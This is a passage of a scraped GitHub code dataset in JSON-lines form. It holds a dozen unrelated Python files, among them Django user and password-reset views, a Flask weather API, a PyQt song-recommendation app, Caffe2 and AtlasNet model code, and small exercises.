you\"})\n\n\n@api_view(['POST'])\n@permission_classes((IsAuthenticated,))\ndef change_password(request):\n data = request.data\n user = request.user\n if (user):\n if user.check_password(data[\"old_password\"]):\n user.set_password(data[\"new_password\"])\n user.save()\n return Response({\"success\": True})\n return Response({\"success\": False, \"error\": \"Server unable to authenticate you\"})\n\n\nclass UploadProfilePic(APIView):\n permission_classes = [IsAuthenticated]\n\n def post(self, request):\n user = request.user\n if user:\n user.profile_pic = request.FILES.get(\"profile_pic\")\n user.save()\n return Response({\"success\": True})\n return Response({\"success\": False, \"error\": \"Server unable to authenticate you\"})\n\n\n@api_view(['POST'])\n@permission_classes((AllowAny,))\ndef forget_password(request):\n data = request.data\n user = User.objects.filter(email=data.get('email')).first()\n if (user):\n user.last_otp_email = generate__otp()\n user.save()\n send_email(user.email, \"Vimani OTP\", user.last_otp_email)\n return Response({\"success\": True})\n return Response({\"success\": False, \"error\": \"Server unable to authenticate you\"})\n\n\n@api_view(['POST'])\n@permission_classes((AllowAny,))\ndef change_password_forget(request):\n data = request.data\n user = User.objects.filter(email=data.get('email')).first()\n if (user):\n if user.last_otp_email == int(data.get('otp')):\n user.set_password(data[\"new_password\"])\n user.save()\n return Response({\"success\": True})\n return Response({\"success\": False, \"error\": \"Server unable to authenticate you\"})\n\n\nclass GetCoupons(generics.ListAPIView):\n queryset = Coupon.objects.all()\n permission_classes = [IsAuthenticated]\n serializer_class = CouponSerializer\n pagination_class = None\n\nclass GetCouponById(generics.RetrieveAPIView):\n queryset = Coupon.objects.all()\n permission_classes = [IsAuthenticated]\n serializer_class = CouponSerializer\n\n\nclass UpdateProfile(APIView):\n permission_classes = [IsAuthenticated]\n\n def post(self, request):\n user = request.user\n data= request.data\n if user:\n user_ser = UserSerializer(user, data=data, partial=True)\n if user_ser.is_valid():\n user_ser.save()\n return Response({\"success\": True})\n return Response({\"success\": False, \"error\": user_ser.errors})\n return Response({\"success\": False, \"error\": \"Server unable to authenticate you\"})\n","repo_name":"prabhat0206/multivendor_ecom_api_django","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16245683937","text":"def get_hash(key: str):\n h = 0\n for char in key:\n h += ord(char)\n return h % 100\n\n\na = [\"kamrul\", \"Hasan\", \"Python\", \"Programmer\"]\n\nfor item in a:\n print(f\"index of {item} is: \", get_hash(item))\n\n\nclass HashTable:\n def __init__(self):\n self.MAX = 100\n self.arr = [None for i in range(self.MAX)]\n\n def get_hash(self, key):\n h = 0\n for char in key:\n h += ord(char)\n return h % self.MAX\n\n def __setitem__(self, key: str, val):\n h = self.get_hash(key)\n self.arr[h] = val\n\n def __getitem__(self, key: str):\n h = self.get_hash(key)\n return self.arr[h]\n\n def __delitem__(self, key: str):\n h = self.get_hash(key)\n self.arr[h] = None\n\n\nht = HashTable()\n# set value by key\nht[\"Kamrul\"] = \"Python\"\nht[\"Hasan\"] = \"Programmer\"\n\nprint(ht[\"Kamrul\"])\nprint(ht[\"Hasan\"])\n\nprint(ht[\"Python\"])\n\n# Delete item\ndel ht[\"Kamrul\"]\n\nprint(ht[\"Kamrul\"])\n","repo_name":"kamrul-pu/problem-solving","sub_path":"data_structure/hash_map.py","file_name":"hash_map.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72930689512","text":"#!/usr/bin/env python3\n\nfrom __future__ import annotations\n\nfrom contextlib import ExitStack\n\nimport torch\nfrom transformers.tokenization_utils import PreTrainedTokenizer\n\n\ndef calculate_acc(outputs: list[dict[str, torch.Tensor]], tokenizer: PreTrainedTokenizer,\n reference_file_path: str = '', debug_file_path: str='') -> float:\n if reference_file_path:\n with open(reference_file_path, 'r') as gold_file:\n reference_file_content = gold_file.read().splitlines()\n\n errors = 0\n total = 0\n\n with ExitStack() as stack:\n if debug_file_path:\n debug_file = stack.enter_context(open(debug_file_path, 'w'))\n\n for output_batch in outputs:\n reference_batch = reference_file_content[total:\n ] if reference_file_path else output_batch['decoder_input_ids']\n for pred, ref in zip(output_batch['outputs'], reference_batch):\n total += 1\n pred_tokens = tokenizer.decode(pred, skip_special_tokens=True)\n ref_tokens = ref.rstrip() if reference_file_path else tokenizer.decode(ref, skip_special_tokens=True)\n\n if pred_tokens != ref_tokens:\n errors += 1\n if debug_file_path:\n debug_file.write(f'{pred_tokens} but {ref_tokens}\\n')\n\n return 1 - (errors / total)\n","repo_name":"msc42/seq2seq-transformer","sub_path":"code/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26217312281","text":"# https://leetcode.com/problems/find-the-original-array-of-prefix-xor/\n# medium?\nclass Solution:\n def findArray(self, pref: List[int]) -> List[int]:\n res = [pref[0]]\n n = len(pref)\n for i in range(1, n):\n res.append(pref[i - 1] ^ pref[i])\n\n return res\n","repo_name":"zhuli19901106/leetcode-zhuli","sub_path":"algorithms/2001-2500/2433_find-the-original-array-of-prefix-xor_1_AC.py","file_name":"2433_find-the-original-array-of-prefix-xor_1_AC.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":557,"dataset":"github-code","pt":"72"} +{"seq_id":"74309690152","text":"\nimport datetime as dt\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\nfrom flask import Flask, jsonify\n\n\n#################################################\n# Database Setup\n#################################################\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\n\n\n\n# reflect an existing database into a new model\nBase = automap_base()\n# reflect the tables\nBase.prepare(engine, reflect=True)\n\n# Save reference to the table\nmeasurements = Base.classes.measurement\nstations = Base.classes.station\n\n# Create our session (link) from Python to the DB\nsession = Session(engine)\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n\n#################################################\n# Temperature Function\n#################################################\ndef calc_temps(start_date, end_date):\n \"\"\"TMIN, TAVG, and TMAX for a list of dates.\n\n Args:\n start_date (string): A date string in the format %Y-%m-%d\n end_date (string): A date string in the format %Y-%m-%d\n \n Returns:\n TMIN, TAVG, and TMAX\n \"\"\"\n session = Session(engine)\n return session.query(func.min(measurements.tobs), func.avg(measurements.tobs), func.max(measurements.tobs)).\\\n filter(measurements.date >= start_date).filter(measurements.date <= end_date).all()\n \n#################################################\n# Flask Routes\n#################################################\n\n@app.route(\"/\")\ndef welcome():\n \"\"\"List all available api routes.\"\"\"\n return (\"Available routes:
    \"\n f\"/api/v1.0/precipitation
    \"\n f\"/api/v1.0/stations
    \"\n f\"/api/v1.0/tobs
    \"\n f\"/api/v1.0/start
    \"\n f\"/api/v1.0/start/end\"\n ) \n\n\n@app.route(\"/api/v1.0/precipitation\")\ndef prcp():\n \n \"\"\"Return a list of all precipitation data\"\"\"\n # Query all precipitation data\n session = Session(engine)\n last_twelve_months = dt.date(2017,8,23) - dt.timedelta(days=365)\n\n results = session.query(measurements.date, measurements.prcp).\\\n filter(measurements.date >= last_twelve_months).\\\n order_by(measurements.date).all()\n\n prcp_list = []\n #prcp_list = dict(results)\n for prcp in results:\n prcp_dict = {}\n prcp_dict[\"date\"] = prcp[0]\n prcp_dict[\"prcp\"] = prcp[1]\n \n prcp_list.append(prcp_dict)\n \n session.close()\n return jsonify(prcp_list)\n \n\n@app.route(\"/api/v1.0/stations\")\ndef mystations():\n \n \"\"\"Return a list of all station names\"\"\"\n # Query all station names\n session = Session(engine)\n results = session.query(stations.station,stations.name).all()\n \n station_list = []\n #station_list = dict(results)\n for station in results:\n station_dict = {}\n station_dict[\"station\"] = station[0]\n station_dict[\"name\"] = station[1]\n \n station_list.append(station_dict)\n\n session.close()\n return jsonify(station_list)\n \n\n@app.route(\"/api/v1.0/tobs\")\ndef mytobs():\n\n \"\"\"Return a list of temperature observations (TOBS) for the previous year\"\"\"\n # Query all the dates and temperature observations of the most active station for the last year of data\n session = Session(engine)\n last_twelve_months = dt.date(2017,8,23) - dt.timedelta(days=365)\n \n results = session.query(measurements.date,measurements.tobs).\\\n filter(measurements.date >= last_twelve_months).\\\n filter(measurements.station == \"USC00519281\").\\\n order_by(measurements.date).all()\n \n\n temp_list = []\n #temp_list = dict(results)\n for temp in results:\n temp_dict = {}\n temp_dict[\"date\"] = temp[0]\n temp_dict[\"tobs\"] = temp[1]\n \n temp_list.append(temp_dict)\n\n session.close()\n\n return jsonify(temp_list) \n\n@app.route(\"/api/v1.0/\")\ndef start(start_date):\n\n \"\"\"Return a list of the minimum temperature, the average temperature, and the max temperature for a given start\"\"\"\n # Query all list of the minimum temperature, the average temperature, and the max temperature for a given start.\n session = Session(engine)\n\n results = (calc_temps(start_date,start_date))\n \n \n\n temp_list = []\n #temp_list = dict(results) \n for temp in results:\n temp_dict = {}\n temp_dict[\"min\"] = temp[0]\n temp_dict[\"avg\"] = temp[1]\n temp_dict[\"max\"] = temp[2]\n \n temp_list.append(temp_dict)\n \n session.close()\n return jsonify(temp_list) \n\n@app.route(\"/api/v1.0//\")\ndef start_end(start,end):\n\n \"\"\"Return a list of the minimum temperature, the average temperature, and the max temperature for a given start and start-end range\"\"\"\n # Query all list of the minimum temperature, the average temperature, and the max temperature for a given start and start-end range.\n session = Session(engine)\n results = (calc_temps(start,end))\n \n temp_list = []\n #temp_list = dict(results)\n for temp in results:\n temp_dict = {}\n temp_dict[\"min\"] = temp[0]\n temp_dict[\"avg\"] = temp[1]\n temp_dict[\"max\"] = temp[2]\n \n temp_list.append(temp_dict)\n \n session.close()\n return jsonify(temp_list) \n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"eddyannobil/sqlalchemy-challenge","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"518303037","text":"# *******************************************************************************\r\n# * Copyright (c) 2011 Wind River Systems, Inc. and others.\r\n# * All rights reserved. This program and the accompanying materials\r\n# * are made available under the terms of the Eclipse Public License v1.0\r\n# * which accompanies this distribution, and is available at\r\n# * http://www.eclipse.org/legal/epl-v10.html\r\n# *\r\n# * Contributors:\r\n# * Wind River Systems - initial API and implementation\r\n# *******************************************************************************\r\n\r\nfrom tcf.services import linenumbers\r\nfrom tcf.channel.Command import Command\r\n\r\nclass LineNumbersProxy(linenumbers.LineNumbersService):\r\n\r\n def __init__(self, channel):\r\n self.channel = channel\r\n\r\n def mapToSource(self, context_id, start_address, end_address, done):\r\n done = self._makeCallback(done)\r\n service = self\r\n class MapCommand(Command):\r\n def __init__(self):\r\n super(MapCommand, self).__init__(service.channel, service,\r\n \"mapToSource\", (context_id, start_address, end_address))\r\n def done(self, error, args):\r\n arr = None\r\n if not error:\r\n assert len(args) == 2\r\n error = self.toError(args[0])\r\n arr = _toCodeAreaArray(args[1])\r\n done.doneMapToSource(self.token, error, arr)\r\n return MapCommand().token\r\n\r\n def mapToMemory(self, context_id, file, line, column, done):\r\n done = self._makeCallback(done)\r\n service = self\r\n class MapCommand(Command):\r\n def __init__(self):\r\n super(MapCommand, self).__init__(service.channel, service,\r\n \"mapToMemory\", (context_id, file, line, column))\r\n def done(self, error, args):\r\n arr = None\r\n if not error:\r\n assert len(args) == 2\r\n error = self.toError(args[0])\r\n arr = _toCodeAreaArray(args[1])\r\n done.doneMapToMemory(self.token, error, arr)\r\n return MapCommand().token\r\n\r\ndef _toCodeAreaArray(o):\r\n if not o: return None\r\n arr = []\r\n directory = None\r\n file = None\r\n for area in o:\r\n directory = area.get(\"Dir\", directory)\r\n file = area.get(\"File\", file)\r\n arr.append(linenumbers.CodeArea(directory, file,\r\n area.get(\"SLine\", 0), area.get(\"SCol\", 0),\r\n area.get(\"ELine\", 0), area.get(\"ECol\", 0),\r\n area.get(\"SAddr\"), area.get(\"EAddr\"),\r\n area.get(\"ISA\", 0),\r\n area.get(\"IsStmt\"), area.get(\"BasicBlock\"),\r\n area.get(\"PrologueEnd\"), area.get(\"EpilogueBegin\")))\r\n return arr\r\n","repo_name":"eswartz/emul","sub_path":"org.eclipse.tcf/python/src/tcf/services/remote/LineNumbersProxy.py","file_name":"LineNumbersProxy.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"72"} +{"seq_id":"4436823353","text":"lista = list()\r\no = 's'\r\nwhile o in 'sS':\r\n lista.append(int(input('Digite um número')))\r\n o = str(input('Quer continuar? [S/N] '))\r\nprint(f'Você digitou {len(lista)} números')\r\nlista.sort(reverse=True)\r\nprint(f\"Em ordem2 decrecente são: {lista}\")\r\nif 5 in lista:\r\n print('O Valor 5 foi digitado!')\r\nelse:\r\n print('O valor 5 não foi digitado')\r\n\r\n","repo_name":"igortuag/DesafiosCursoEmVideo","sub_path":"ex081.py","file_name":"ex081.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15656019706","text":"def range(*args):\n if len(args) == 1:\n start = 0\n stop = args[0]\n step = 1\n elif len(args) == 2:\n start, stop = args\n step = 1\n elif len(args) == 3:\n start, stop, step = args\n l = []\n i = start\n while i < stop:\n l.append(i)\n i += step\n return l\n\ndef myFunction(**kwargs):\n print(kwargs)","repo_name":"rayzchen/Python-tutorials","sub_path":"tutorial7.py","file_name":"tutorial7.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"38782805217","text":"from PyQt5.QtWidgets import QMainWindow, QApplication, QPlainTextEdit, QPushButton, QLabel, QWidget\nfrom PyQt5 import uic\nfrom PyQt5.QtGui import QPixmap\nimport sys\nfrom PIL import Image, ImageEnhance\nimport logic.inputanalysis\n\nclass SongRecommendWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n\n uic.loadUi(\"recompage.ui\", self) #recomendations window time\n \n trackname = logic.inputanalysis.tracknamee\n\n self.img1 = self.findChild(QLabel, \"img1\")\n self.txt1 = self.findChild(QLabel, \"text_1\")\n self.img2 = self.findChild(QLabel, \"img1_2\")\n self.txt2 = self.findChild(QLabel, \"text_2\")\n self.img3 = self.findChild(QLabel, \"img1_3\")\n self.txt3 = self.findChild(QLabel, \"text_3\")\n self.img4 = self.findChild(QLabel, \"img1_4\")\n self.txt4 = self.findChild(QLabel, \"text_4\")\n self.img5 = self.findChild(QLabel, \"img1_5\")\n self.txt5 = self.findChild(QLabel, \"text_5\")\n self.img6 = self.findChild(QLabel, \"img1_6\")\n self.txt6 = self.findChild(QLabel, \"text_6\")\n\n im = Image.open('rec1.jpg')\n enhancer = ImageEnhance.Brightness(im)\n im_output = enhancer.enhance(0.5)\n im_output.save('rec1.jpg')\n \n im2 = Image.open('rec2.jpg')\n enhancer = ImageEnhance.Brightness(im2)\n im2_output = enhancer.enhance(0.5)\n im2_output.save('rec2.jpg')\n \n im3 = Image.open('rec3.jpg')\n enhancer = ImageEnhance.Brightness(im3)\n im3_output = enhancer.enhance(0.5)\n im3_output.save('rec3.jpg')\n\n im4 = Image.open('rec4.jpg')\n enhancer = ImageEnhance.Brightness(im4)\n im4_output = enhancer.enhance(0.5)\n im4_output.save('rec4.jpg')\n\n im5 = Image.open('rec5.jpg')\n enhancer = ImageEnhance.Brightness(im5)\n im5_output = enhancer.enhance(0.5)\n im5_output.save('rec5.jpg')\n\n im6 = Image.open('rec6.jpg')\n enhancer = ImageEnhance.Brightness(im6)\n im6_output = enhancer.enhance(0.5)\n im6_output.save('rec6.jpg')\n \n pixmap = QPixmap('rec1.jpg')\n self.img1.setPixmap(pixmap)\n self.img1.setScaledContents(True)\n self.txt1.setText(trackname[0])\n\n pixmap = QPixmap('rec2.jpg')\n self.img2.setPixmap(pixmap)\n self.img2.setScaledContents(True)\n self.txt2.setText(trackname[1])\n\n pixmap = QPixmap('rec3.jpg')\n self.img3.setPixmap(pixmap)\n self.img3.setScaledContents(True)\n self.txt3.setText(trackname[2])\n\n pixmap = QPixmap('rec4.jpg')\n self.img4.setPixmap(pixmap)\n self.img4.setScaledContents(True)\n self.txt4.setText(trackname[3])\n\n pixmap = QPixmap('rec5.jpg')\n self.img5.setPixmap(pixmap)\n self.img5.setScaledContents(True)\n self.txt5.setText(trackname[4])\n\n pixmap = QPixmap('rec6.jpg')\n self.img6.setPixmap(pixmap)\n self.img6.setScaledContents(True)\n self.txt6.setText(trackname[5])\n self.show()\n\n\nclass SongInputWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n \n uic.loadUi(\"inputwindow.ui\", self) #second window time\n \n self.textbox = self.findChild(QPlainTextEdit, \"textbox\")\n self.submitbutton = self.findChild(QPushButton, \"submit\")\n self.taxt = self.findChild(QLabel, \"label\")\n self.submitbutton.clicked.connect(self.clicker2)\n self.show()\n \n def clicker2(self, clicked):\n logic.inputanalysis.saving_input(self)\n SongInputWindow.hide(self) #moving to 3rd window\n self.w = SongRecommendWindow()\n self.w.show()\n \n\nclass MainWindow(QMainWindow):\n\n def __init__(self):\n super(MainWindow, self).__init__()\n\n #loading the UI file\n uic.loadUi(\"findtuneui.ui\", self)\n\n #defining the widgets\n self.gsbutton = self.findChild(QPushButton, \"Getstart_button\")\n\n #actions\n self.gsbutton.clicked.connect(self.clicker)\n\n #showing the app\n self.show()\n \n def clicker(self, checked): \n MainWindow.hide(self)\n self.w = SongInputWindow()\n self.w.show()\n\ndef mainApp():\n app = QApplication(sys.argv) #initialize the app\n w = MainWindow()\n w.setWindowTitle(\"FindTune\")\n w.show()\n sys.exit(app.exec_())\n\nif __name__ == '__main__':\n mainApp()\n","repo_name":"pranav-avn/FindTune-R","sub_path":"mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":4416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14815957099","text":"\n\n\n\n\nfrom caffe2.python import core, schema\nfrom caffe2.python.modeling.net_modifier import NetModifier\n\nimport numpy as np\n\n\nclass ComputeStatisticsForBlobs(NetModifier):\n \"\"\"\n This class modifies the net passed in by adding ops to compute statistics\n for certain blobs. For each blob in the list, its min, max, mean and standard\n deviation will be computed.\n\n Args:\n blobs: list of blobs to compute norm for\n logging_frequency: frequency for printing norms to logs\n \"\"\"\n\n def __init__(self, blobs, logging_frequency):\n self._blobs = blobs\n self._logging_frequency = logging_frequency\n self._field_name_suffix = '_summary'\n\n def modify_net(self, net, init_net=None, grad_map=None, blob_to_device=None,\n modify_output_record=False):\n\n for blob_name in self._blobs:\n blob = core.BlobReference(blob_name)\n assert net.BlobIsDefined(blob), 'blob {} is not defined in net {} whose proto is {}'.format(blob, net.Name(), net.Proto())\n\n cast_blob = net.Cast(blob, to=core.DataType.FLOAT)\n stats_name = net.NextScopedBlob(prefix=blob + self._field_name_suffix)\n stats = net.Summarize(cast_blob, stats_name, to_file=0)\n net.Print(stats, [], every_n=self._logging_frequency)\n\n if modify_output_record:\n output_field_name = str(blob) + self._field_name_suffix\n output_scalar = schema.Scalar((np.float64, (1,)), stats)\n\n if net.output_record() is None:\n net.set_output_record(\n schema.Struct((output_field_name, output_scalar))\n )\n else:\n net.AppendOutputRecordField(\n output_field_name,\n output_scalar)\n\n def field_name_suffix(self):\n return self._field_name_suffix\n","repo_name":"pytorch/pytorch","sub_path":"caffe2/python/modeling/compute_statistics_for_blobs.py","file_name":"compute_statistics_for_blobs.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"12538395878","text":"class Solution:\n def nextPermutation(self, nums: List[int]) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n def swap(array, i, j):\n array[i], array[j] = array[j], array[i]\n \n def reverse(array, start):\n \"\"\" reverse the postfix subarray starting from 'start' \"\"\"\n end = len(array) - 1\n while start < end:\n array[start], array[end] = array[end], array[start]\n start += 1\n end -= 1\n \n # locate the pair of elements to switch\n i = len(nums) - 2\n while i >= 0:\n if nums[i] < nums[i+1]:\n break\n i -= 1\n \n if i >= 0:\n j = len(nums) - 1\n while j > 0:\n if nums[j] > nums[i]:\n break\n j -= 1\n \n swap(nums, i, j)\n \n # reverse the postfix in order to obtain the minimal permutation\n reverse(nums, i+1)\n","repo_name":"liaison/LeetCode","sub_path":"python/31_next_permutation.py","file_name":"31_next_permutation.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"72"} +{"seq_id":"25239298216","text":"import pymesh\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.utils.data\nimport numpy as np\nfrom torch.autograd import Variable\n\n\nclass SquareTemplate():\n def __init__(self, device=0):\n self.device = device\n self.dim = 2\n self.npoints = 0\n\n def get_random_points(self, shape, device=\"gpu0\"):\n \"\"\"\n Get random points on a Sphere\n Return Tensor of Size [x, 2, x ... x]\n \"\"\"\n rand_grid = torch.cuda.FloatTensor(shape).to(device).float()\n rand_grid.data.uniform_(0, 1)\n return Variable(rand_grid)\n\n def get_regular_points(self, npoints=2500, device=\"gpu0\"):\n \"\"\"\n Get regular points on a Square\n Return Tensor of Size [x, 3]\n \"\"\"\n if not self.npoints == npoints:\n self.npoints = npoints\n vertices, faces = self.generate_square(np.sqrt(npoints))\n self.mesh = pymesh.form_mesh(vertices=vertices, faces=faces) # 10k vertices\n self.vertex = torch.from_numpy(self.mesh.vertices).to(device).float()\n self.num_vertex = self.vertex.size(0)\n self.vertex = self.vertex.transpose(0,1).contiguous().unsqueeze(0)\n\n return Variable(self.vertex[:, :2].contiguous().to(device))\n\n @staticmethod\n def generate_square(grain):\n \"\"\"\n Generate a square mesh from a regular grid.\n :param grain:\n :return:\n \"\"\"\n grain = int(grain)\n grain = grain - 1 # to return grain*grain points\n # generate regular grid\n faces = []\n vertices = []\n for i in range(0, int(grain + 1)):\n for j in range(0, int(grain + 1)):\n vertices.append([i / grain, j / grain, 0])\n\n for i in range(1, int(grain + 1)):\n for j in range(0, (int(grain + 1) - 1)):\n faces.append([j + (grain + 1) * i,\n j + (grain + 1) * i + 1,\n j + (grain + 1) * (i - 1)])\n for i in range(0, (int((grain + 1)) - 1)):\n for j in range(1, int((grain + 1))):\n faces.append([j + (grain + 1) * i,\n j + (grain + 1) * i - 1,\n j + (grain + 1) * (i + 1)])\n\n return np.array(vertices), np.array(faces)\n\ndef get_num_ada_norm_params(model):\n # return the number of AdaNorm parameters needed by the model\n num_ada_norm_params = 0\n for m in model.modules():\n if m.__class__.__name__ == \"AdaptiveBatchNorm1d\" or m.__class__.__name__ == \"AdaptiveInstanceNorm\":\n num_ada_norm_params += 2 * m.norm.num_features\n return num_ada_norm_params\n\nclass AdaptiveBatchNorm1d(nn.Module):\n def __init__(self, num_features, eps=1e-5, momentum=0.1, affine=True):\n super(AdaptiveBatchNorm1d, self).__init__()\n self.norm = nn.BatchNorm1d(num_features, eps, momentum, affine)\n\n def forward(self, x, params):\n \n a = params[:, :params.size(1) // 2].unsqueeze(2)\n b = params[:, params.size(1) // 2:].unsqueeze(2)\n print(x.shape)\n print(a.shape)\n print(b.shape)\n return a*x + b * self.norm(x) # TODO(msegu): ouch, why a * x and not just a? Must be a bug\n\nclass Mapping2Dto3D(nn.Module):\n \"\"\"\n Core Atlasnet Function.\n Takes batched points as input and run them through an MLP.\n Note : the MLP is implemented as a torch.nn.Conv1d with kernels of size 1 for speed.\n Note : The latent vector is added as a bias after the first layer. Note that this is strictly identical\n as concatenating each input point with the latent vector but saves memory and speeed.\n Author : Thibault Groueix 01.11.2019\n \"\"\"\n\n def __init__(self):\n self.style_bottleneck_size = 512\n self.bottleneck_size = 1024\n self.input_size = 2 #for square\n self.dim_output = 3\n self.hidden_neurons = 512\n self.num_layers = 2\n self.num_layers_style = 1\n # self.activation = nn.ReLU()\n self.decode_style = True\n\n super(Mapping2Dto3D, self).__init__()\n self.activation = nn.ReLU()\n\n print(\n f\"New MLP decoder : hidden size {self.hidden_neurons}, num_layers {self.num_layers}, \"\n f\"num_layers_style {self.num_layers_style}, activation {self.activation}\")\n \n self.conv1 = torch.nn.Conv1d(self.input_size, self.bottleneck_size, 1)\n self.conv2 = torch.nn.Conv1d(self.bottleneck_size, self.hidden_neurons, 1)\n self.conv_list = nn.ModuleList(\n [torch.nn.Conv1d(self.hidden_neurons, self.hidden_neurons, 1) for i in range(self.num_layers)])\n self.conv_list_style = nn.ModuleList(\n [torch.nn.Conv1d(self.hidden_neurons, self.hidden_neurons, 1) for i in range(self.num_layers_style)])\n self.last_conv = torch.nn.Conv1d(self.hidden_neurons, self.dim_output, 1)\n\n norm = torch.nn.BatchNorm1d \n self.bn1 = norm(self.bottleneck_size)\n self.bn2 = norm(self.hidden_neurons)\n self.bn_list = nn.ModuleList([norm(self.hidden_neurons) for i in range(self.num_layers)])\n self.bn_list_style = nn.ModuleList(\n [norm(self.hidden_neurons) for i in range(self.num_layers_style)])\n\n\n def forward(self, x, content, style):\n x = self.conv1(x) + content\n x = self.activation(self.bn1(x))\n x = self.activation(self.bn2(self.conv2(x)))\n for i in range(self.num_layers):\n x = self.activation(self.bn_list[i](self.conv_list[i](x)))\n\n if self.decode_style:\n x = x + style\n for i in range(self.num_layers_style):\n x = self.activation(self.bn_list_style[i](self.conv_list_style[i](x)))\n return self.last_conv(x)\n\n\n\nclass AdaptiveMapping2Dto3D(nn.Module):\n \"\"\"\n Core Atlasnet Function.\n Takes batched points as input and run them through an MLP.\n Note : the MLP is implemented as a torch.nn.Conv1d with kernels of size 1 for speed.\n Note : The latent vector is added as a bias after the first layer. Note that this is strictly identical\n as concatenating each input point with the latent vector but saves memory and speeed.\n Author : Thibault Groueix 01.11.2019\n \"\"\"\n\n def __init__(self):\n self.bottleneck_size = 1024\n self.input_size = 2 #for square\n self.dim_output = 3\n self.hidden_neurons = 512\n self.num_layers = 2\n self.num_layers_style = 1\n # self.activation = nn.ReLU()\n self.decode_style = True\n\n super(AdaptiveMapping2Dto3D, self).__init__()\n\n self.activation = nn.ReLU()\n print(\n f\"New MLP decoder : hidden size {self.hidden_neurons}, num_layers {self.num_layers}, \"\n f\"activation {self.activation}\")\n\n self.conv1 = torch.nn.Conv1d(self.input_size, self.bottleneck_size, 1)\n self.conv2 = torch.nn.Conv1d(self.bottleneck_size, self.hidden_neurons, 1)\n\n self.conv_list = nn.ModuleList(\n [torch.nn.Conv1d(self.hidden_neurons, self.hidden_neurons, 1) for i in range(self.num_layers)])\n\n self.last_conv = torch.nn.Conv1d(self.hidden_neurons, self.dim_output, 1)\n\n self.bn1 = AdaptiveBatchNorm1d(self.bottleneck_size)\n self.bn2 = AdaptiveBatchNorm1d(self.hidden_neurons)\n\n self.bn_list = nn.ModuleList([AdaptiveBatchNorm1d(self.hidden_neurons) for i in range(self.num_layers)])\n\n \n\n def forward(self, x, content, adabn_params):\n x = self.conv1(x) + content\n x = self.activation(self.bn1(x, adabn_params[:, 0:self.bottleneck_size * 2]))\n x = self.activation(self.bn2(\n self.conv2(x), adabn_params[:,\n self.bottleneck_size * 2:\n self.bottleneck_size * 2 + self.hidden_neurons * 2]))\n for i in range(self.num_layers):\n x = self.activation(self.bn_list[i](\n self.conv_list[i](x),\n adabn_params[:,\n self.bottleneck_size * 2 + (1 + i) * self.hidden_neurons * 2:\n self.bottleneck_size * 2 + (2 + i) * self.hidden_neurons * 2]))\n\n return self.last_conv(x)\n\nclass StyleAtlasnet(nn.Module):\n\n def __init__(self, number_points, nb_primitives):\n \"\"\"\n Core Atlasnet module : decoder to meshes and pointclouds.\n This network takes an embedding in the form of a latent vector and returns a pointcloud or a mesh\n :param opt: \n \"\"\"\n super(StyleAtlasnet, self).__init__()\n self.device = 'cuda:0' if torch.cuda.is_available() else 'cpu'\n\n # Define number of points per primitives\n self.nb_primitives = nb_primitives\n self.nb_pts_in_primitive = number_points // nb_primitives\n self.nb_pts_in_primitive_eval = number_points // nb_primitives\n\n # Initialize templates\n self.template = [SquareTemplate(self.device) for i in range(0, self.nb_primitives)]\n\n # Initialize deformation networks\n self.decoder = nn.ModuleList([Mapping2Dto3D() for i in range(0, nb_primitives)])\n\n\n def forward(self, content_latent_vector, style_latent_vector, train=True):\n \"\"\"\n Deform points from self.template using the embedding latent_vector\n :param train: a boolean indicating training mode\n :param content_latent_vector: an opt.bottleneck size vector encoding the content of a 3D shape.\n size : batch, bottleneck\n :param style_latent_vector: an opt.bottleneck size vector encoding the style of a 3D shape.\n size : batch, bottleneck\n :return: A deformed pointcloud of size : batch, nb_prim, num_point, 3\n \"\"\"\n if train:\n input_points = [self.template[i].get_random_points(\n torch.Size((1, self.template[i].dim, self.nb_pts_in_primitive)),\n content_latent_vector.device) for i in range(self.nb_primitives)]\n else:\n input_points = [self.template[i].get_regular_points(self.nb_pts_in_primitive_eval,\n device=content_latent_vector.device)\n for i in range(self.nb_primitives)]\n\n # Deform each patch\n num_adabn_params = get_num_ada_norm_params(self.decoder[0])\n # print(num_adabn_params)\n # print(style_latent_vector.shape)\n # print(seld.decoder[0])\n # output_patches = [self.decoder[i](input_points[i],\n # content_latent_vector.unsqueeze(2),\n # style_latent_vector[:, i*num_adabn_params:(i+1)*num_adabn_params]\n # ).unsqueeze(1)\n # for i in range(0, self.nb_primitives)]\n output_patches = [self.decoder[i](input_points[i],\n content_latent_vector.unsqueeze(2),\n style_latent_vector.unsqueeze(2)\n ).unsqueeze(1)\n for i in range(0, 